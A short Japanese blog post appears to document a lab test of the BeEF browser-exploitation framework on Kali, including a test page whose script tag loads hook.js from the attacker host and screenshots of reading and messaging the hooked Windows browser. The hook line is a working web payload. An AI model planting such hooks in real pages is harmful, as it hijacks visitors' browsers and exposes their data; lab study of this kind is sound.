shikata ga nai

Private? There is no such things.

BeEFの動作確認をしてみた

Hello there, ('ω')ノ

 

敵を知らないと対策はできず。

また、過剰に対策をしてしまったりと。

KaliのメニューからBeEFを起動して。

 

f:id:ThisIsOne:20201221085353p:plain

 

f:id:ThisIsOne:20201221085306p:plain

 

あらかじめ、KaliのIPアドレスを確認しておいて。

 

f:id:ThisIsOne:20201221073010p:plain

 

Kaliでテスト用のWEBページを作成するために。

 /var/www/html/

 

f:id:ThisIsOne:20201221073119p:plain

 

下記のように、test.htmlを作成して。

JavaScriptでBeEFに接続するように。

 

<!DOCTYPE html>

<html>

 <head>

  <title>Web Server</title>
  <script src="http://192.168.1.49:3000/hook.js"></script>

 </head>

 <body>

  <h1>Welcome My Site!</h1>

  <p>Let's Hack!</p>

 </body>

</html>

 

さっそく、WEBサーバを起動して。

 service apache2 start

 

f:id:ThisIsOne:20201221075019p:plain

 

WindowsのブラウザからKaliのWEBページにアクセスすると。

 http://192.168.1.49/test.html

 

f:id:ThisIsOne:20201221085109p:plain

 

一方、KaliではBeEFのコントロールパネルで。

アクセスしてきたWindowsの情報を得ることができて。

 

f:id:ThisIsOne:20201221083502p:plain

 

さらには、CommandsタグからアクセスしてきたWindowsのブラウザに。

メッセージを送信することができて。

 

f:id:ThisIsOne:20201221084103p:plain

 

Windowsのブラウザには下記のように表示されて。

 

f:id:ThisIsOne:20201221084142p:plain

 

また、BeEFの停止は下記のコマンドで。

 service beef-xss stop

 

f:id:ThisIsOne:20201221084847p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain